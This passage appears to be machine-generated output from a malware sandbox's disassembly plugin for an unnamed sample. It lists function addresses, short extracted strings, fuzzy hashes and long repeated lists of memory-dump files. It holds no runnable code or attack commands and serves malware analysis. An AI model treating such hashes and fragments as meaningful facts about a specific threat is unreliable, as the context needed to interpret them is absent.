Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID:
String ID: 1_Z{$`Sno$cA,X
API String ID: 0-294355249
Opcode ID: 3492ca3eba89cecc2d79c9089327dd78f9be759306cb22a33fa2de3a1bbd3270
Instruction ID: ee0ceea579cb4dd9fc0d443d2316eb18865a715e367572f959198405ee83b01b
Opcode Fuzzy Hash: 3492ca3eba89cecc2d79c9089327dd78f9be759306cb22a33fa2de3a1bbd3270
Instruction Fuzzy Hash: 64B205F3A0C2049FE3046E29EC8567AFBE9EF94320F164A3DEAC5C7744E63558058697

Function 00CED7AF Relevance: 5.2, Strings: 4, Instructions: 213COMMON

Download Yara Rule

Strings

CV, xrefs: 00CED98B
#', xrefs: 00CED9EA
T>, xrefs: 00CED984
KV, xrefs: 00CED97D

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID:
String ID: #'$CV$KV$T>
API String ID: 0-95592268
Opcode ID: 4e3b4cbfa5cf5f2085c84ad14b75a1e773709bc512da719eebbc1ad809afc406
Instruction ID: eddaa5a327b95556ac95ed80c7b1a3e96b89d3577f687bf32f22327d65d485c0
Opcode Fuzzy Hash: 4e3b4cbfa5cf5f2085c84ad14b75a1e773709bc512da719eebbc1ad809afc406
Instruction Fuzzy Hash: 338146B48017499BDB20DF96D68516EBFB1FF12300F60560CE486AB655C330AA56CFE3

Function 00CEAC91 Relevance: 5.1, Strings: 4, Instructions: 128COMMON

Download Yara Rule

Strings

lk, xrefs: 00CEACBC
,{*y, xrefs: 00CEAD07, 00CEAD13
(g6e, xrefs: 00CEACA1
4c2a, xrefs: 00CEACA9

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID:
String ID: (g6e$,{*y$4c2a$lk
API String ID: 0-1327526056
Opcode ID: c72236bea8391ad3a32e15ebc128da1b85673e77f4b2f3ccc5f0ae4a71952261
Instruction ID: 5e028be26aafaa156b4c5b0851a7b9e5107866c1fae9224c8bb01e7e0e298f63
Opcode Fuzzy Hash: c72236bea8391ad3a32e15ebc128da1b85673e77f4b2f3ccc5f0ae4a71952261
Instruction Fuzzy Hash: A94184B4808381CED7209F20D800BABB7F0FF86305F54995DE6D897261DB31DA45CBA6

Function 00CEC470 Relevance: 4.2, Strings: 3, Instructions: 419COMMON

Download Yara Rule

Strings

~/i!, xrefs: 00CEC537
%*+(, xrefs: 00CEC9E4, 00CEC9ED
%*+(, xrefs: 00CEC8C3, 00CEC8CB

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID:
String ID: %*+($%*+($~/i!
API String ID: 0-4033100838
Opcode ID: 95959c01a5f584653d24a5ce4fa585704a0b30764897aa858416264327d23a32
Instruction ID: a43ecc136e6f1d0a9660d5b4461162e9b627154c21086d67c6c58952b2fecb7b
Opcode Fuzzy Hash: 95959c01a5f584653d24a5ce4fa585704a0b30764897aa858416264327d23a32
Instruction Fuzzy Hash: C5E19AB5508384EFE3209F25D881B5BBBF5FB85340F44882CE69987291DB36D816CB62

Function 00CC8590 Relevance: 4.1, Strings: 3, Instructions: 387COMMON

Download Yara Rule

Strings

), xrefs: 00CC8616
), xrefs: 00CC860C
IEND, xrefs: 00CC89F0

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: b6e08b59b6bd5e8c64cb58f7e3d68a02174dd7c124e4422d593592c122d02242
Instruction ID: c41d252ee8504a9b22f4fef767d68165dca0303c555c2121701336923ce0beb9
Opcode Fuzzy Hash: b6e08b59b6bd5e8c64cb58f7e3d68a02174dd7c124e4422d593592c122d02242
Instruction Fuzzy Hash: A3E1D1B1A087019FE310CF29C885B2BBBE0BB94314F14492DF59997381DB75E919DBD2

Function 00D04040 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

f, xrefs: 00D0420C
%*+(, xrefs: 00D040A4, 00D040AD

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID:
String ID: %*+($f
API String ID: 0-2038831151
Opcode ID: 676beb5dcf2898c80ad17e5fb258a3ef1526f2b8002a0497bed9e1b0a3a722ce
Instruction ID: 1fe222a481a98ccaf32c4fb8b5684bf23b7b5ee60d8674ff8968ad9e51f1dca4
Opcode Fuzzy Hash: 676beb5dcf2898c80ad17e5fb258a3ef1526f2b8002a0497bed9e1b0a3a722ce
Instruction Fuzzy Hash: 42129CB16083419FC714CF18D890B2BBBE5FBC9314F588A2CF69897291D775D845CBA2

Function 00CC35B0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON

Download Yara Rule

Strings

NaN, xrefs: 00CC360E
Inf, xrefs: 00CC3607

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID:
String ID: Inf$NaN
